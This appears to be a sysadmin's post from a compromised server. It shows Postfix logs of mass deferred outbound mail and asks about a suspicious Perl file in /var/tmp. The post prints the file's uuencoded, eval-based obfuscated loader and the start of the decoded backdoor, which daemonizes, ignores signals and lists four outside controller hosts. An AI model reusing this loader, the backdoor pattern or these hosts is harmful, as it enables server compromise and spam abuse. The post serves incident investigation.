Mail logs: /var/log/maillog
[$USER@$HOST ~]# ls -lah /var/log/maillog
-rw------- 1 $USER $USER 389M May 5 16:38 /var/log/maillog
[$USER@$HOST ~]#
[$USER@$HOST ~]# tail /var/log/maillog
...
May 5 16:38:12 $HOST postfix/error[23503]: BFB7D5C5B: to=, relay=none, delay=113860, delays=113860/0/0/0.02, dsn=4.4.2, status=deferred
May 5 16:38:12 $HOST postfix/error[23444]: B1F795B2F: to=, relay=none, delay=126392, delays=126392/0/0/0.01, dsn=4.4.2, status=deferred
May 5 16:38:12 $HOST postfix/error[23508]: B43325D1C: to=, relay=none, delay=109668, delays=109668/0/0/0.01, dsn=4.4.2, status=deferred
May 5 16:38:12 $HOST postfix/error[23484]: B7C3D5D1D: to=, relay=none, delay=109668, delays=109668/0/0/0.01, dsn=4.4.2, status=deferred
(delivery temporarily suspended: lost connection with mx-aol.mail.gm0.yahoodns.net[98.136.96.92] while sending RCPT TO)
...
What is this script for?
[$USER@$HOST ~]# cat /var/tmp/LcRVzNke
my $HyAZMgSzvm='';$HyAZMgSzvm.=$_ while();$HyAZMgSzvm=unpack('u*',$HyAZMgSzvm);$HyAZMgSzvm=~s/295c445c5f495f5f4548533c3c3c3d29/7e797f7f786969607f226f6361233834/gs;eval($HyAZMgSzvm);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
...
[$USER@$HOST ~]# sed s/eval/print/ /var/tmp/LcRVzNke
[$USER@$HOST ~]# perl /var/tmp/LcRVzNke
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["5.135.42.98:80","sakurajshtml.org:80","treesnosfx.com:443","libertymovmx.net:80"];
...